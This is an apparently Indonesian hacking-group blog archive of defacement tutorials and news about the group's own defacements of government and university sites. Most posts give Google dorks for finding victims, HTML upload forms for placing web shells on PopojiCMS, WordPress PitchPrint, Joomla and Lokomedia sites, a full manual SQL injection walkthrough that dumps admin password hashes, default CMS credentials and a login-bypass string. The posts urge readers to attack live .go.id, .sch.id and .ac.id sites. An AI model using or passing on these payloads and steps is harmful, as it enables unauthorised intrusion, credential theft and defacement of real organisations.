Jumat, 05 Agustus 2016

Cara Deface CMS POPOJI

Oke Karna popoji lagi bomming :v saya mau buat tutor deface CMS Popoji
Udh langsung no bnyk kecot :v
DORK
inurl:"/detailpost site:sch.id"
Inurl:/detailpost site:.co.id
Powered by Popoji
© popojicms
kreasi kan sendiri njeng :v

Next
Stepp 1

buka site/po-admin lalu klik create aaccount di bawah

 

Stepp 2

isi form data diri anda :'v
Stepp 3 kalo seperti ini sukses lanjut
stepp 4 buka email kalian verif akun
Stepp 4 login akun di site/po-admin kalo sukses kaya d ss eyak

Stepp 5
exploit kan ini po-admin/js/plugins/uploader/upload.php
kalo seperti d ss lanjut
CSRF CODE
 <form method="post" action="target.wew/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>

 stepp 6 next  buka csrf upload shell kalian dalam bentuk jpg ingat JPG bukan PHP
Akses Shell site/po-content/po-upload



Salam 
N00bz Security Squad
PhantomGhost

Kamis, 04 Agustus 2016

Tutorial Deface WP PitchPrint Vulnerable


    

   Hallo Gans skarang admin tamvan ini akan share tutor yg jos . 

Dapatnya sih dari blog teman :D , dan saya coba exploitnya trnyata masih bnyak yg vuln mas .

Tanpa basa basi langsung aja pelajari tutornya di bwah ini .

Dork : "inurl:wp-content/plugins/pitchprint/" ( tanpa tanda kutip bos )

Exploit vulnerability : /wp-content/plugins/pitchprint/uploader/

CSRF :

<form method="POST" action="contoh.com/wp-content/plugins/pitchprint/uploader/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>



     Seperti biasa gunakan dorknya menggunakan search engine (google) :v

klau sudah dapat targetnya contoh

http://semvak.com/wp-content/plugins/pitchprint/

     masukkin exploit vulnerability tadi yg ada di atas cok .

nanti tanda vulnnya kyak gini mas bro .





Klau sudah kyak gitu  mas , sisa upload Shellnya broe , pake CSRF yang tadi ada diatas .



Klau gambarnya kek gitu berarti suksek .

jdi sisa panggil shellnya gampang kyak gini mas contohnya :

http://semvak.com/wp-content/plugins/pitchprint/uploader/files/namashellkau.php



Tarararararararararararararararararar :v , mudah kan bos?


Thanks To : www.sidoarjogetar.com - FrozenBear 404 - PhantomGhost - Sulawesi IT Sec




Rabu, 03 Agustus 2016

Tutorial Deface Dengan SQL Manual


 

    Admin Tamvan Kembali :) .

      Skarang sya bkal nge share "Tutorial Deface Dengan SQL Manual"
Sebenarnya Exploit ini sudah sangat lama yah , cma msih bnyak yg vulnerable sih :D .
Kalau Ndak prcaya langsung cek tutornya selengkapnya di bwah ini Bos .

Dork : "inurl:berita.php?id=" (kembangin lgi biar dapat yg lbih jos :D

Masukkin dulu dorknya di google Bos 8-)

Klau sudah dapat vuln target contoh kek gini .

http://contoh.com/berita_detail.php?id_berita=190

Coba Tambahin string bos kek gini ' nanti klau vuln ada kata" kek gini > Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given i

Berarti itu tandanya vuln Bos .



Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan Bos gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.

Contoh kyak gini

http://contoh.com/berita_detail.php?id=190+order+by+1--  > tdk error :p
http://contoh.com/berita_detail.php?id=190+order+by+2--  > tdk error :p
http://contoh.com/berita_detail.php?id=190+order+by+3--  > tdk error :P
http://contoh.com/berita_detail.php?id=190+order+by+4--  > tdk error :p
http://contoh.com/berita_detail.php?id=190+order+by+5--  > tdk error :p
http://contoh.com/berita_detail.php?id=190+order+by+6--  > tdk error :p ( skip aja dah )
http://contoh.com/berita_detail.php?id=190+order+by+15-- > Nah akhirnya error jg :D



Nah Pada Angka 15 Trnyata Error Bos :D , Jdi yang kita ambil angka yg sebelumnya muncul error , berarti kita ambil angka 14 Bos , angka 14 berarti jumlah DB nya ( database ) .

Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:

http://contoh.com/berita_detail.php?id_=-190+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--


Disini bisa kita lihat bahwa angka yang muncul yaitu 4. angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.


 Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah"version()" atau "@@version".
contoh: 


http://contoh.com/berita_detail.php?id_=-190+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14



Nah bisa kita lihat versi db sql yang di pakai pada website nya v 5.5.50 , jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.


       Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --. Contoh : 

http://contoh.com/berita_detail.php?id=-190+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()--


Nah Akhirnya keliatan table nya : agenda,album,berita,gallery,kategori,member,member2,menu,modul,r_bonus,r_member,reward,tag,user_menu,users . Langkah selanjutnya kita akan mencari username dan password admin pada tabel Users. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel users harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya disini > https://www.easycalculation.com/ascii-hex.php . Kemudian hsil konversi dari table Users adalah 117 115 101 114 115lalu kita masukkan ke CHAR(117, 115, 101, 114, 115) dan pisahkan dengan koma. jadi perintahnya seperti berikut:


http://contoh.com/berita_detail.php?id=-190+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=CHAR(117, 115, 101, 114, 115)--



Nah disitu muncul kolom username , password , nama_lengkap , email , dll :D . lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,password)jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah  +from+users-- , users merupakan tabel yang kita dapatkan tadi.

http://contoh.com/berita_detail.php?id=-190+union+select+1,2,3,group_concat(USERNAME,0x3a,PASSWORD),5,6,7,8,9,10,11,12,13,14+from+users--


Taraatataratara . Akhirnya user adminnya keliatan tuh :v , admin:21232f297a57a5a743894a0e4a801fc3,marketing:748423960d692273f277c32e275d459c

 Passwordnya msih bentuk md5 bos jdi klian sendiri yg hash yah :D .

Mudahkan bos? tentu lah klau klian mau belajar bersungguh" hsilnya pasti sangat memuaskan :D .

Thanks To : Mr.3RR0R - PhantomGhost Reborn - Sulawesi IT Sec

Minggu, 03 Juli 2016

Tutorial Deface Dengan SQLI Lokomedia Vulnerable




^_^ Assalamualaikum ^_^

   Maaf Baru Ngepost lagi , Jaringan lelet + udah bosan ngeblog lagi -_- .

Mumpung jringan cepet sekarang saya akan bagikan kepada agan" "Tutorial Deface Dengan SQLI Lokomedia Vulnerable" .

Klau Begitu langsung saja baca yuk . Cekidot :D

Dork : inurl:statis-1-profil.html (kembangin lgi biar dapat bnyak)

exploit vuln : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Langsung sja gunakan dork diatas menggunakan search engine (google.com) .

Klau sudah dapat Targetnya contoh kyak gini nih Mas Mbah .

www.site.go.id/statis-1-profil.html

Langsung saja masukkan exploit diatas

www.site.go.id/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html

Nanti username dan password adminnya keliatan tuh di title webnya .

kyak gini .




Kan disitu tdk keliatan jelas passnya klau mau liat fullnya tambahkan "view-source:" Contoh kek gini.


Tuh kan Udah keliata user dan pass adminnya^_^

Tapi passwordnya msih berbentuk md5 -_- terpaksa hrus di hash dulu mas mbah ^_^

Link hash md5 : https://hashkiller.co.uk/md5-decrypter.aspx

Sisa cari saja sendiri halaman loginnya , contoh :

www.site.go.id/adminweb | www.site.go.id/administrator | www.site.go.id/admin | www.site.go.id/redaktur

Ok gitu aja basa basinya om :D

Langsung aja di praktekin :v . Jangan lupa tetap coli di rumah :V

Thanks To : Sec7or Team | Bang Andra | PhantomGhost Team | Sulawesi IT Sec


Selasa, 21 Juni 2016

CuteNews Remote File Upload Vulnerable


   
  ^-^ Assalamualaikum Mas Mba ^-^

Sekarang saya akan share tutorial sederhana ini "CuteNews Remote File Upload Vulnerable"

kenapa sya bilang sederhana krena exploit ini sangat mudah untuk di pahami :D .

Langsung aja baca artikel di bwah ini .

Dork = "powered by cutenews" ( kembangin lgi dorknya yah biar dapat banyak )

Gunakan Dork Diatas Dengan Menggunakan Mesin Pencaharian Google

Klau sudah dapat targetnya , vulnnya kayak gini



Nah disitu ada tulisan register klik disitu , buat mendaftar jadi member :D 

Isi semua kolomnya dengan benar :v . contohnya kyak gini :




Kalau sudah di daftar klik box yg bertuliskan register , nanti klau vuln gambarnya kayak gini .



Klau sudah msuk kayak gini trus ada kolom upload files berarti vuln .

Langsung aja upload shellmu , trus klik box "Save Changes"

Klau berhasil nanti tempat shellnya kyak gini

www.site.com/cutenews/uploads/avatar_mar_namashellmu.php

contoh klau nama shellmu coli.php

www.site.com/cutenews/uploads/avatar_mar_coli.php

Mudahkan :D , Langsung aja praktekin Bos .

^-^ Waasalamualaikum ^-^


Thanks To : Mr.3RR0R | PhantomGhost Team | Sulawesi IT Sec

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Kamis, 09 Juni 2016

Tutorial Deface Dengan Com_Media




      Assalamualaikum mas mbah ^_^

Sekarang lanjut ke tutorial selanjutnya "Tutorial Deface Dengan Com_Media" sebenarnya exploit ini bisa disebut exploit jadul , soalnya ini exploit sudah lama sekali :D .

Tapi exploit nya masih joss kok . masih bnyak yg perawan :D

Langsung aja yah :D .

Dork : "inurl:com_media" (tanpa kutip , kembangin lagi yah itu cuman dork default :) )

Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

   Gunakan dorknya dulu dengan menggunakan mesin pencaharian google :D .





    Pilih salah satu target :D

Klau udah dapat contoh kyak gini .

www.site.com/

   Masukkan exploit yang di atas tadi :D , jadinya nanti kyak gini

www.site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

   Kalau vuln nanti gambarnya kek gini Mas dan Mbah :D





  Tinggal Upload deh file mu :D

Note: file yang bisa diupload berextensi .txt .jpg .gif .png, Untuk html dan php tidak bisa.





Selesai Path Uploadnya Disini > www.site.com/images/file/nama.txt


Gitu aja mudahkan.? , Langsung hjar master dan jgn lupa tetap enjoy :D

Waasalamualaikum ^_^

Thanks To : PhantomGhost - Sulawesi IT Sec

Source Images : https://sulawesi-itsecurity.blogspot.co.id/

Hacker Sejati Meretas Untuk Kesenangan




  Banyak peretas yang menjalankan aksinya untuk merusak sistem sampai mengeruk keuntungan materi. Namun Kaspersky menilai peretas yang menggunakan keahliannya untuk mengeruk uang orang lain bukanlah seorang hacker sejati.

  Dikatakan pihak Kaspersky, hacker atau peretas yang sesungguhnya itu bukan mencari keuntungan. Mereka melakukan aksi peretasan hanya untuk kesenangan pribadi.

  "Hacker yang sebenarnya itu, mereka melakukan hanya untuk kesenangan, bukan untuk mencari kepentingan ekonomi," ujar Territory Channel Manager Kaspersky SEA Indonesia, Dony Koemandarin, ditemui di Ritz Carlton Hotel, Mega Kuningan, Jakarta, Kamis, 26 November 2015.

  Lebih lanjut ia menjelaskan, saat ini banyak peretas bermunculan dan digunakan kemampuannya untuk kejahatan. Itu disebutnya bukan kategori hacker sebenarnya. Hacker, kata dia, melakukan sesuatu didasari‎ karena kesenangan.

  "Berbicara spionase, mata-mata perusahaan, cyber criminal dengan struktur hacker yang teroganisir, itu bukan hacker yang sebenarnya. Dengan di bawah organisasi yang baik, yang ditata dengan rapih cara kerjanya untuk melakukan peretasan‎, itu bukan hacker sesungguhnya," tegasnya.

  Peretas bagi dia itu, seperti kemampuan membobol password, membuat malware yang membuat dia menjadi terkenal, bukan untuk kejahatan dengan tingkat keberlanjutan yang mencari keuntungan semata.

  "‎Kalau ada yang bilang hacker juga manusia, balik lagi siapa yang memegang dia. Kalau direkrut aktivis, dia untuk kesenangan. Hacker itu gak punya tujuan, betul-betul untuk kesenangan. Biasanya, mereka meretas untuk membantu teman-teman dia," ucapnya.


Thanks To : Sulawesi IT Sec

Source : VIVA NEWS & https://sulawesi-itsecurity.blogspot.co.id/

Selasa, 07 Juni 2016

Akun Media Sosial Mark Zuckerberg Dibobol Hacker



       Assalamualaikum ^_^

  Siapa yang tak kenal Mark Zuckerberg , CEO sekaligus pendiri media sosial yang terkenal bernama facebook .

Namun siapa sangka akun Mark Zuckerberg ternyata bisa juga di bobol oleh para hacker .

Seperti yang di lansir Venture Beat , disebutkan bahwa akun CEO facebook ini diretas hacker

media sosial Mark Zuckerberg yang di retas hacker ini adalah twitter dan pinterest

Dibalik semua ini adalah sekumpulan hacker yang menyebut nama teamnya dengan nama "OurMine Team" .

  Bisa dilihat gambar akun media sosial Mark Zuckerberg setelah diretas .






   Masih belum jelas motif hacker ini , ada yang menduga hacker ini sedang menguji sistem keamanan kedua media sosial tersebut .

Senin, 30 Mei 2016

Joomla Plugins VMCOSTUM Arbitrary File Upload





  Assalamualakum Mas Mbah :D

 Sekarang sya akan memberikan Tutorial "Joomla Plugins VMCOSTUM Arbitrary  File Upload"

Sebenarnya sya dapat tutor ini cuman jalan jalan ke blog orang sih :v

Klau gitu langsung aja baca artikel di bwah ini yah mas mbah :D .


  Dork : inurl:/plugins/vmcustom/

Masukkan dork diatas menggunakan mesin pencarian bukan mesin ketik yah :D

klau udah pilih salah satu web masukkan exploitnya kyak di bwah ini

"site.com/path/plugins/vmcustom/photoupload/assets/server/php/"

tanda vulnerable webnya kyak gini mas mbah


Klau Sudah kyak gitu sisa upload shellmu dengan menggunakan csrf di bwah


<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload</font>
<form method="POST" action="TARGET.com/path/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form><br>

Yang berwarna biru ganti dengan web vuln target yg sudah di dapat .

save dengan extensi .html mas mbah :D .

File yg bsa di upload cuman yg berextensi : PHP,HTML,JPG,PNG,JPEG,GIF .

Klau sudah di upload panggil shellnya disini

"www.site.com/tmp/shellberbentukrandom.php"

Atau

"www.site.com/tmp/nx_d5cc371096f4e5516bf0ea7b10707d68/0/Shellmu.php"

   Mudahkan Sisa praktekin dan tetap santai yah :D

Klau Kurang mengerti atau kurang vaham sisa isi kolom komentar yah :D

Exploit Author : AnoaGhost

Source Images : https://shirotenshii.blogspot.co.id/

Thanks To : PhantomGhost - Sulawesi IT Sec

Sabtu, 28 Mei 2016

Situs Institut Pertanian Bogor Diretas



   Kasus peretasan Semakin Merajalela . Kali ini situs Institut Pertanian Bogor yang jadi korban. Peretas yang yang nama teamnya "PhantomGhost" menambahkan file " -.html " di root path domain IPB.




Seperti gambar diatas Ini , Sampai sekarang file tersebut belum dihapus, menandakan celah nya belum ditutup oleh admin web IPB.
Mengenai motif peretasan sendiri kemungkinan hanya sekedar iseng . Terbukti tidak ada pesan khusus di script mereka . Hanya kata kata :


Hacking Not just a name..
Hacking Not a Crime.. Hacking Is ART.

Namun menurut mirror di zone-h.org , tanggal 26 April 2016, situs tersebut juga dibobol oleh peretas dengan kodenama Leohaxor404



Mirror nya bisa dilihat disini :
http://zone-h.org/mirror/id/26313317

LeoHaxor404 berasal dari tim yang sama yaitu PhantomGhost.

Yah semoga saja admin website IPB segera melakukan patching agar tidak ada lagi peretasan yang mungkin lebih parah seperti drop database dll.

Source : http://news.linuxsec.org/

Thanks To : All Member PhantomGhost Dan Sulawesi IT Sec


Bug Upload CMS Lokomedia Vulnerable



    Assalamualaikum ^_^

Lama udah nggak update , gmana kbarnya.? Mudah mudahan baik aja yah , Klau sakit pergi saja dulu bobo entar mati Siapa yg tanggung jwab :v .

Sekarang sya akan membagikan Tutor "Bug Upload CMS Lokomedia Vulnerable" Kepada para mastah :v Tapi Perhatikan Dengan Baik , Karena Bug Nya Agak Rumit -_- . 

Klau gitu langsung aja baca artikel di bwah :D .

Dork : allinurl:media.php?module=berita

Gunakan Dork diatas dengan menggunakan mesin pencarian :D .

Kemudian pilih salah satu target yg mau di hajar :v .

klau sudah dapat masuk dulu di halaman loginnya mas mbah .

biasanya halaman loginnya kyak gini : 

www.site.com/administrator/

atau 

www.site.com/adminweb/

atau

www.site.com/admin/

Klau udah msuk di halaman loginnya masukkan url ini "modul/mod_banner.php"

Contoh kyak gini nih

www.site.com/admin/modul/mod_banner.php





Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :


nanti ada di source code tersebut kyak gini ".aksi.php?module=banner&act=input"

Masukkan Source Code yg di atas di belakang url target kyak gini

www.site.com/admin/aksi.php?module=banner&act=input

Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki.

Klau mau lihat hasil upload shellnya disini mas mbah :D

www.site.com/admin/foto_berita/namashell.php

Mudahkan.? Sisa di praktekin nih mastah , dan jangan lupa Enjoy

Kalau Ada Kurang Vaham Atau Belum mengerti Isi Aja Kolom komentar , Atau Bisa Kunjungi Fanspage Kami "https://mobile.facebook.com/Mr3RR0R-1605930586394122/".

Waasalamualaikum ^_^



Thanks To : All Member PhantomGhost Dan Sulawesi IT Sec









Jumat, 20 Mei 2016

Situs Kementerian PPPA Diretas


   
     Situs Kementerian Pemberdayaan Perempuan dan Perlindungan Anak malam ini (23/3) kena retas. Saat dibuka pukul 20.40, situs http://www.kemenpppa.go.id/ tak bisa dibuka sama sekali dan justru muncul tulisan The PHANTOMGHOST dengan latar belakang gambar interior bangunan tua dan tengkorak, disertai animasi bintang-bintang dengan warna background hitam. Juga terdengar jelas lagu Jar of Heart yang dilantunkan Christina Perri.
Isi tulisan lengkapnya berbunyi, ”Anakmu bukan milikmu. Mereka putra putri sang Hidup yang rindu pada diri sendiri, Lewat engkau mereka lahir, namun tidak dari engkau, Mereka ada padamu, tapi bukan hakmu. Berikan mereka kasih sayangmu, tapi jangan sodorkan bentuk pikiranmu, Sebab mereka ada alam pikiran tersendiri. Patut kau berikan rumah untuk raganya, Tapi tidak untuk jiwanya, Sebab jiwa mereka adalah penghuni rumah masa depan, yang tiada dapat kau kunjungi meski dalam mimpi. Kau boleh berusaha menyerupai mereka, Namun jangan membuat mereka menyerupaimu Sebab kehidupan tidak pernah berjalan mundur, Pun tidak tenggelam di masa lampau. Kaulah busur, dan anak-anakmulah?Anak panah yang meluncur. Sang Pemanah Maha Tahu sasaran bidikan keabadian. Dia merentangmu dengan kekuasaan-Nya, Hingga anak panah itu melesat, jauh serta cepat. Meliuklah dengan suka cita dalam rentangan tangan Sang Pemanah, Sebab Dia mengasihi anak-anak panah yang melesat laksana kilat Sebagaimana pula dikasihiNya busur yang mantap..”.
Sementara di bawah tulisan tersebut tertera seperti identitas peretas yang bertuliskan: “we are : 4prili666h05T – VANKAS7IC – JackWho – Mr.Aljabar – Mr.3RR0R – gekikara404 – Mr.DeFroz – KidSZonk – Harith10”. Di bawahnya ada menu “contact” yang setelah diklik, ternyata menuju fanpage Facebook: Phantom Ghost.
Phantom Ghost FB

Sampai saat ini, belum ada keterangan resmi dari pihak Kementerian PPPA. Juga belum diketahui sejak kapan situs Kementerian PPPA tersebut diretas.
Hal yang sama pernah dialami situs Sekretariat Kabinet yang diretas 25 Desember 2015 lalu. Saat itu lamanhttp://www.setkab.go.id/ juga tak bisa diakses. Tampilan lamannya hanya muncul gambar tengkorak dan terdengar musik disko

Source : http://kastaranews.com/situs-kementerian-pppa-diretas/

Rabu, 11 Mei 2016

Default User Lokomedia Vulnerable




    Assalamualaikum ^_^


Sebelum sya memberitahukan Default User Lokomedia Vulnerable .
Klian hrus tau dulu apa itu cms lokomedia itu.?

lokomedia adalah CMS asli ciptaan indonesia , jdi klau ngerusakin tanggung jwab aja :D .

langsung aja cek di bwah tutornya mbah :

Dork : inurl:/adminweb site:id < kembangin lgi biar dapat bnyak

gunakan dork di atas yah di professor google .

klau udah dapat targetnya . gambarnya kyak gini




Masukkan user dan passwordnya di bwah ini

u : admin | p : admin

atau

u : wiro | p : sableng

atau

u : joko | p : sembung

Klau sukses nanti gambarnya kyak gini mas vro :v :




Selamat mas vro . itu tandanya sukses masuk ke hlaman adminnya :D

Gitu aja . Mudah kan .?? .

Silahkan di praktekin aja dan tetap enjoy :D

Waasalamualaikum


Thanks To : PhantomGhost

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Ikuti Jg Yah Faccebook Saya Dengan Mengklik bgian samping kanan atas "Ikuti"

Minggu, 08 Mei 2016

Tutorial Deface Dengan Siakad


  

   Assalamualaikum ^-^

Halo gan , gmana kabarnya..? , Sekarang lanjut yah ke tutor selanjutnya .

Langsung cek di Artikel di bwah .

Dork : inurl:"?mnux=" site:id

Masukkan Dork nya di pencarian google , kyak di iklan  TV OK Google  :v .

Pilih web yg mau di tebas yah  , nanti gambarnya kyak gini mas vro :D , Trus Pilih "Super user"


                     


Nanti kita di suruh masukkan user dan pass di webnya :3 , Masukan user dan pass ini : '=''or'


                    

Klau webnya kyak gini , berarti berhasil masuk jdi user , langsung aja masuk di menu "keuangan >> 02 File Biaya Mhsw" , trus isi data"




                     


Lalu klau udah sampe di tulisan "upload files" langsung aja upload shellmu gan , kyak gambar dbwah


                      

Klau mau panggil shellnya disini gan .

contoh : www.site.ac.id/tmpbank/namashellmu.php


OK Gitu aja gan , klau ada yg kurang vaham sisa isi komen di bwah yah ^_^

waasalamualaikum ^_^

Source and Thanks : http://selapancyber.blogspot.co.id/

Facebook : https://www.facebook.com/marselERROR